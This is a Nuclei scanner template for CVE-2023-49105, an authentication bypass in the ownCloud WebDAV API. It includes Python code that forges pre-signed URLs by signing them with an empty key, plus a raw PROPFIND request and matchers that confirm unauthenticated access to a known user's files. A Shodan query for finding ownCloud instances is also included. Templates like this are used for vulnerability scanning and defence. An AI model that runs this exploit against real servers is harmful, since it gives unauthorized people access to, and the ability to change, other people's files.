89 lines
3.0 KiB
YAML
89 lines
3.0 KiB
YAML
id: CVE-2023-49105
|
|
|
|
info:
|
|
name: OwnCloud - WebDAV API Authentication Bypass
|
|
author: ChristianPoeschl,FlorianDewald,usdAG
|
|
severity: critical
|
|
description: |
|
|
An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
|
|
reference:
|
|
- https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
|
|
- https://github.com/0xfed/ownedcloud
|
|
- https://owncloud.org/security
|
|
- https://github.com/ambionics/owncloud-exploits
|
|
- https://github.com/nomi-sec/PoC-in-GitHub
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-49105
|
|
cwe-id: CWE-287
|
|
epss-score: 0.21237
|
|
epss-percentile: 0.96302
|
|
cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: owncloud
|
|
product: owncloud
|
|
shodan-query: title:"owncloud"
|
|
tags: cve,cve2023,code,owncloud,auth-bypass
|
|
variables:
|
|
username: admin
|
|
|
|
code:
|
|
- engine:
|
|
- py
|
|
- python3 # requires python to be pre-installed on system running nuclei
|
|
source: |
|
|
# build signature for presigned urls
|
|
import base64, hashlib, datetime, os
|
|
from urllib.parse import urlencode
|
|
|
|
username = os.getenv('username')
|
|
base_url = os.getenv('BaseURL')
|
|
dav_url = f'{base_url}/remote.php/dav/files/{username}'
|
|
oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
|
|
data = {
|
|
'OC-Expires': '991200',
|
|
'OC-Verb': 'PROPFIND',
|
|
'OC-Credential': username,
|
|
'OC-Date': oc_date
|
|
}
|
|
sig_url = f'{dav_url}?{urlencode(data)}'
|
|
# derive signature from empty sign key
|
|
dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
|
|
final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
|
|
#final_url = f'{sig_url}&OC-Signature={dk.hex()}'
|
|
print(final_url)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
PROPFIND {{code_response}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: text/xml
|
|
Authorization: Basic {{base64('{{username}}')}}
|
|
|
|
matchers-condition: or
|
|
matchers:
|
|
- type: dsl
|
|
name: bypass-correct-user
|
|
dsl:
|
|
- status_code == 207
|
|
- contains(body, 'owncloud.org')
|
|
condition: and
|
|
|
|
- type: word
|
|
name: bypass-wrong-user
|
|
part: body
|
|
words:
|
|
- User unknown
|
|
- Sabre
|
|
- Exception
|
|
- NotAuthenticated
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: dsl
|
|
dsl:
|
|
- '"Username => "+ username'
|
|
# digest: 490a00463044022036740507180fa43831d3d59a5ccaae05fa1108c27c42a19564fa3f0fc5da439f02205a94a9cbb26731a679d9d39a80c72ff0ff1c48346680963d6aa05f94de9b2e95:922c64590222798bb761d5b6d8e72950 |